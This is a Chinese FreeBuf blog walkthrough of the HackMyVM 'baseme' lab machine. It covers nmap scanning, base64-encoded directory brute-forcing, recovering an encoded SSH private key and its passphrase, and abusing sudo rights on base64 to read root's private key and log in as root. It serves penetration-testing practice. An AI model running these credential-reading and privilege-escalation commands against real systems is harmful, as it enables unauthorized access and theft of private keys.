freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

记一次hackmyvm综合靶场的渗透测试-baseme
2022-03-09 18:08:01
所属地 黑龙江省

前言

KALI攻击机:192.168.1.128

靶机地址:未知

信息收集阶段

1646820062_62287ade77025e4e4d4d9.png!small?1646820064268

nmap -A 192.168.1.17

1646820069_62287ae56b2a181778acc.png!small?1646820071246

开启了22端口和80端口:

漏洞利用阶段

访问一下80端口:

1646820085_62287af59731292750075.png!small?1646820087324

有一串:

QUxMLCBhYnNvbHV0ZWx5IEFMTCB0aGF0IHlvdSBuZWVkIGlzIGluIEJBU0U2NC4KSW5jbHVkaW5nIHRoZSBwYXNzd29yZCB0aGF0IHlvdSBuZWVkIDopClJlbWVtYmVyLCBCQVNFNjQgaGFzIHRoZSBhbnN3ZXIgdG8gYWxsIHlvdXIgcXVlc3Rpb25zLgotbHVjYXMK

我们查看一下源码:

1646820100_62287b048dfd4ba9ad783.png!small?1646820102315

我们把那串编码解码下看看。

echo "QUxMLCBhYnNvbHV0ZWx5IEFMTCB0aGF0IHlvdSBuZWVkIGlzIGluIEJBU0U2NC4KSW5jbHVkaW5nIHRoZSBwYXNzd29yZCB0aGF0IHlvdSBuZWVkIDopClJlbWVtYmVyLCBCQVNFNjQgaGFzIHRoZSBhbnN3ZXIgdG8gYWxsIHlvdXIgcXVlc3Rpb25zLgotbHVjYXMK " | base64 -d

1646820107_62287b0be6e558bdc05d0.png!small?1646820109635

你所需要的所有数据都需要base64编码?包括你需要的密码,记住BAS64是所有问题的答案!--lucas!!!

接下俩,我们需要进行目录扫描,但是由于上面的提示信息,我们首先需要把字典通过base64进行编码!

for i in $(cat /usr/share/wordlists/SecLists-2022.1/Discovery/Web-Content/common.txt);do echo $i | base64 >> dict64.txt;done //这个字典需要下载,下载后各种报毒

1646820121_62287b191398652761322.png!small?1646820122794

gobuster dir -u http://192.168.1.17 -w dict64.txt

扫出来2个目录

1646820170_62287b4a80517f3174806.png!small?1646820172265

访问下看看:

http://192.168.1.17/aWRfcnNhCg==

下载下来一个文件,看着像base64

1646820177_62287b51d0101da23df34.png!small?1646820179675

cat /root/Downloads/aWRfcnNhCg=\= | base64 -d ,像是密钥文件。

1646820184_62287b585bfeb8b8e264e.png!small?1646820186230

还有一个文件:http://192.168.1.17/c**ib3RzLnR4dAo=这里啥也没有。

1646820190_62287b5e7ac2043701975.png!small?1646820192217

这里,我们把刚才发现的密钥文件生成id文件。

cat /root/Downloads/aWRfcnNhCg=\= | base64 -d >> id

用户是lucas,使用密钥文件

chmod 600 id

ssh -i id lucas@192.168.1.17

1646820197_62287b65602e34b3c63b7.png!small?1646820199101

这个密钥需要key

可以在哪呢?在这呢

1646820209_62287b71dcf04746b2b80.png!small?1646820211633

但是这个需要base64加密

1646820219_62287b7b37f4aa1d95d5e.png!small?1646820220938

这里我们写个脚本对这个文件进行base64加密

for i in $(cat pass.txt);do echo $i | base64 >> pass2.txt;done

1646820225_62287b81277d16995a070.png!small?1646820226900

第一个就是key

1646820233_62287b8965d732a201cd2.png!small?1646820235254

1646820239_62287b8f328b9f26bc853.png!small?1646820240988

cat user.txt

HM*********JA

权限提升阶段

接下来,我们需要进行root权限提升

我们看下:lucas可以执行sudo权限:

1646820320_62287be0c2325d0ed5d12.png!small?1646820322533

这里,我们对root的密钥加密再解密

sudo base64 " / root /. ssh / id_rsa " | base64 -- decode >> rootid

1646820325_62287be5d43ed58ced06d.png!small?1646820327824

chmod 600 rootid

ssh -i rootid root@127.0.0.1

1646820331_62287bebe5f2792496c2e.png!small?1646820333701

最后一个root flag:H*********S64

# 渗透测试 # web安全 # 内网渗透 # CTF
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者
文章目录